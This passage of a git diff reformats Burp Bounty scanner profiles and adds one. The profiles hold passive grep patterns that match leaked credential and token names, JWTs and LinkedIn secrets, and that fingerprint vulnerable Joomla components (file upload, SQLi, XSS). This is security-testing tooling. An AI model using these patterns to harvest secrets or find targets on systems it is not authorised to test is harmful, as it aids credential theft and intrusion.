+ "true,Or,wpt[_-]db[_-]user",
+ "true,Or,wpt[_-]prepare[_-]dir",
+ "true,Or,wpt[_-]report[_-]api[_-]key",
+ "true,Or,wpt[_-]ssh[_-]connect",
+ "true,Or,wpt[_-]ssh[_-]private[_-]key[_-]base64",
+ "true,Or,www[_-]googleapis[_-]com",
+ "true,Or,yangshun[_-]gh[_-]password",
+ "true,Or,yangshun[_-]gh[_-]token",
+ "true,Or,yt[_-]account[_-]client[_-]secret",
+ "true,Or,yt[_-]account[_-]refresh[_-]token",
+ "true,Or,yt[_-]api[_-]key",
+ "true,Or,yt[_-]client[_-]secret",
+ "true,Or,yt[_-]partner[_-]client[_-]secret",
+ "true,Or,yt[_-]partner[_-]refresh[_-]token",
+ "true,Or,yt[_-]server[_-]api[_-]key",
+ "true,Or,zendesk[_-]travis[_-]github",
+ "true,Or,zensonatypepassword",
+ "true,Or,zhuliang[_-]gh[_-]token",
+ "true,Or,zopim[_-]account[_-]key"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Interesting Keywords",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Tentative",
+ "IssueDetail": "Interesting Keywords detected. Needs manual revision, it could means nothing",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/JS_LinkFinder.bb b/profiles/JS_LinkFinder.bb
old mode 100644
new mode 100755
index aed0f95..873aefd
--- a/profiles/JS_LinkFinder.bb
+++ b/profiles/JS_LinkFinder.bb
@@ -1 +1,59 @@
-[{"Name":"JS_LinkFinder","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?:\"|\u0027)(((?:[a-zA-Z]{1,10}://|//)[^\"\u0027/]{1,}\\.[a-zA-Z]{2,}[^\"\u0027]{0,})|((?:/|\\.\\./|\\./)[^\"\u0027\u003e\u003c,;| *()(%%$^/\\\\\\[\\]][^\"\u0027\u003e\u003c,;|()]{1,})|([a-zA-Z0-9_\\-/]{1,}/[a-zA-Z0-9_\\-/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|/][^\"|\u0027]{0,}|))|([a-zA-Z0-9_\\-]{1,}\\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\\?[^\"|^\u0027]{0,}|)))(?:\"|\u0027)"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"application/javascript","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"JS LinkFinder","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "JS_LinkFinder",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?:\"|\u0027)(((?:[a-zA-Z]{1,10}://|//)[^\"\u0027/]{1,}\\.[a-zA-Z]{2,}[^\"\u0027]{0,})|((?:/|\\.\\./|\\./)[^\"\u0027\u003e\u003c,;| *()(%%$^/\\\\\\[\\]][^\"\u0027\u003e\u003c,;|()]{1,})|([a-zA-Z0-9_\\-/]{1,}/[a-zA-Z0-9_\\-/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|/][^\"|\u0027]{0,}|))|([a-zA-Z0-9_\\-]{1,}\\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\\?[^\"|^\u0027]{0,}|)))(?:\"|\u0027)"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "application/javascript",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "JS LinkFinder",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/JWT-Request.bb b/profiles/JWT-Request.bb
index 369e8a4..c617fd8 100755
--- a/profiles/JWT-Request.bb
+++ b/profiles/JWT-Request.bb
@@ -1 +1,60 @@
-[{"Name":"JWT-Request","Enabled":true,"Scanner":3,"Author":"@Sy3Omda","UrlEncode":false,"Grep":["true,Or,All Request,Name,[\u003d ]eyJ[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*"],"Tags":["JWT","All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":true,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"NegativeCT":false,"IsResponseCode":false,"NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"JWT-Detected","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"JWT Detected: \u003cbr\u003e\u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "JWT-Request",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 3,
+ "Author": "@Sy3Omda",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,All Request,Name,[\u003d ]eyJ[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*"
+ ],
+ "Tags": [
+ "JWT",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": true,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "JWT-Detected",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "JWT Detected: \u003cbr\u003e\u003cgrep\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/JWT.bb b/profiles/JWT.bb
old mode 100644
new mode 100755
index 0517b12..c910f70
--- a/profiles/JWT.bb
+++ b/profiles/JWT.bb
@@ -1 +1,60 @@
-[{"Name":"JWT","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,^(ey[A-Za-z0-9_-]*\\.[A-Za-z0-9._-]*|ey[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*)","true,Or,[^a-zA-Z0-9](ey[A-Za-z0-9_-]*\\.[A-Za-z0-9._-]*|ey[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*)"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"JWT","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "JWT",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,^(ey[A-Za-z0-9_-]*\\.[A-Za-z0-9._-]*|ey[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*)",
+ "true,Or,[^a-zA-Z0-9](ey[A-Za-z0-9_-]*\\.[A-Za-z0-9._-]*|ey[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*)"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "JWT",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Joomla-ArbitraryFileUpload.bb b/profiles/Joomla-ArbitraryFileUpload.bb
old mode 100644
new mode 100755
index 73b395e..3508acd
--- a/profiles/Joomla-ArbitraryFileUpload.bb
+++ b/profiles/Joomla-ArbitraryFileUpload.bb
@@ -1 +1,60 @@
-[{"Name":"Joomla-ArbitraryFileUpload","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["index.php?option\u003dcom_joomanager"],"Tags":["CMS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Joomla-ArbitraryFileUpload","IssueSeverity":"High","IssueConfidence":"Firm","IssueDetail":"Joomla Arbitrary File Upload:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4687/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Joomla-ArbitraryFileUpload",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 3,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,All Request,Value,index.php?option\u003dcom_joomanager"
+ ],
+ "Tags": [
+ "CMS",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Joomla-ArbitraryFileUpload",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Joomla Arbitrary File Upload:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4687/",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Joomla-CVE-2015-7297.bb b/profiles/Joomla-CVE-2015-7297.bb
new file mode 100755
index 0000000..ba47490
--- /dev/null
+++ b/profiles/Joomla-CVE-2015-7297.bb
@@ -0,0 +1,61 @@
+[
+ {
+ "ProfileName": "Joomla-CVE-2015-7297",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,powered by joomla 3.2",
+ "true,Or,powered by joomla 3.3",
+ "true,Or,powered by joomla 3.4"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Joomla-SQLi",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Joomla SQLi - CVE-2015-7297: \u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4110/",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Joomla-ReflectedXSS.bb b/profiles/Joomla-ReflectedXSS.bb
old mode 100644
new mode 100755
index 4f2853f..6de94c2
--- a/profiles/Joomla-ReflectedXSS.bb
+++ b/profiles/Joomla-ReflectedXSS.bb
@@ -1 +1,61 @@
-[{"Name":"Joomla-ReflectedXSS","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["sendmessage.php?type\u003dskype"],"Tags":["XSS","CMS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Joomla-ReflectedXSS","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Joomla-ReflectedXSS:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4398/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Joomla-ReflectedXSS",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 3,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,All Request,Value,sendmessage.php?type\u003dskype"
+ ],
+ "Tags": [
+ "XSS",
+ "CMS",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Joomla-ReflectedXSS",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Joomla-ReflectedXSS:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4398/",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/JoomlaSQLi-com_artforms.bb b/profiles/JoomlaSQLi-com_artforms.bb
old mode 100644
new mode 100755
index 2aacf2f..4828739
--- a/profiles/JoomlaSQLi-com_artforms.bb
+++ b/profiles/JoomlaSQLi-com_artforms.bb
@@ -1 +1,59 @@
-[{"Name":"JoomlaSQLi-com_artforms","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["index.php?option\u003dcom_artforms"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"JoomlaSQLi","IssueSeverity":"High","IssueConfidence":"Firm","IssueDetail":"Joomla \"com_artforms\" component SQL Injection:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4386/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "JoomlaSQLi-com_artforms",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 3,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,All Request,Value,index.php?option\u003dcom_artforms"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "JoomlaSQLi",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Joomla \"com_artforms\" component SQL Injection:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4386/",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/LinkedIn_Client_ID.bb b/profiles/LinkedIn_Client_ID.bb
old mode 100644
new mode 100755
index 7b10d29..b444ad2
--- a/profiles/LinkedIn_Client_ID.bb
+++ b/profiles/LinkedIn_Client_ID.bb
@@ -1 +1,59 @@
-[{"Name":"LinkedIn_Client_ID","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)linkedin(.{0,20})?(?-i)[\u0027\\\"][0-9a-z]{12}[\u0027\\\"]"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"LinkedIn Client Id","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "LinkedIn_Client_ID",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?i)linkedin(.{0,20})?(?-i)[\u0027\\\"][0-9a-z]{12}[\u0027\\\"]"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "LinkedIn Client Id",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/LinkedIn_Secret.bb b/profiles/LinkedIn_Secret.bb
old mode 100644
new mode 100755
index fa260d3..8ccb85d
--- a/profiles/LinkedIn_Secret.bb
+++ b/profiles/LinkedIn_Secret.bb
@@ -1 +1,59 @@
-[{"Name":"LinkedIn_Secret","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)linkedin(.{0,20})?[\u0027\\\"][0-9a-z]{16}[\u0027\\\"]"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"LinkedIn Secret","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "LinkedIn_Secret",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?i)linkedin(.{0,20})?[\u0027\\\"][0-9a-z]{16}[\u0027\\\"]"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "LinkedIn Secret",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Linux-Apache2-conf.bb b/profiles/Linux-Apache2-conf.bb
index e871424..451c411 100755
--- a/profiles/Linux-Apache2-conf.bb
+++ b/profiles/Linux-Apache2-conf.bb
@@ -1 +1,950 @@
